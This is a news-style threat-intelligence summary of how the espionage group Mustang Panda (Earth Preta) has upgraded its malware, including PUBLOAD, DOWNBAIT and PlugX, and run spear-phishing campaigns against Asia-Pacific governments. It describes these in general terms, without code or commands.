Mustang Panda Refines Malware Arsenal to Target Asia-Pacific Governments 

Overview 

The threat actor known as Mustang Panda has significantly upgraded its malware toolkit, enabling advanced data exfiltration and the deployment of sophisticated payloads, as detailed in a recent report by Trend Micro. This group, monitored under the name Earth Preta, has been particularly active in cyber espionage campaigns aimed at government entities throughout the Asia-Pacific (APAC) region. 

Recent Developments 

Trend Micro’s findings highlight the propagation of a malware variant known as PUBLOAD, which is being spread via a worm variant called HIUPAN. PUBLOAD, a downloader linked to Mustang Panda since early 2022, plays a crucial role in cyber-attacks by facilitating the delivery of the PlugX malware. 

Malware Features and Functions 

PUBLOAD is designed not only to execute reconnaissance on infected networks but also to harvest sensitive files, including documents and spreadsheets. Additionally, it serves as a conduit for supplemental tools like FDMTP, a secondary control tool, and PTSOCKET, an alternative method for exfiltrating data. 

The exfiltrated information is typically compressed into a RAR archive and sent to an attacker-controlled FTP site using cURL. Mustang Panda also employs the custom PTSOCKET program for multi-threaded file transfers. 

Spear-Phishing Campaigns 

In June 2024, Trend Micro identified a “fast-paced” spear-phishing campaign linked to Mustang Panda. This campaign distributed emails with .url attachments that, when activated, deployed a signed downloader known as DOWNBAIT. Targeted countries included Myanmar, the Philippines, Vietnam, Singapore, Cambodia, and Taiwan, with specific filenames and decoy documents tailored to these regions. 

DOWNBAIT serves as a first-stage loader that retrieves and executes PULLBAIT shellcode in memory. This shellcode subsequently downloads and launches a backdoor referred to as CBROVER, which allows for file downloads and remote shell execution, ultimately facilitating the deployment of the PlugX remote access trojan (RAT). 

Evolving Tactics 

Recent reports from Palo Alto Networks’ Unit 42 have revealed that Mustang Panda has also exploited Visual Studio Code’s embedded reverse shell feature, indicating a shift in their operational tactics. This evolution points to a more sophisticated approach to infiltrating target networks. 

Conclusion 

The advancements observed in Earth Preta’s malware deployment and strategies underscore the ongoing threats faced by government entities in the Asia-Pacific region. As Mustang Panda continues to refine its tactics—from multi-stage downloaders to leveraging cloud services for data exfiltration—staying informed and vigilant is essential for organizations in the area to mitigate potential cyber risks.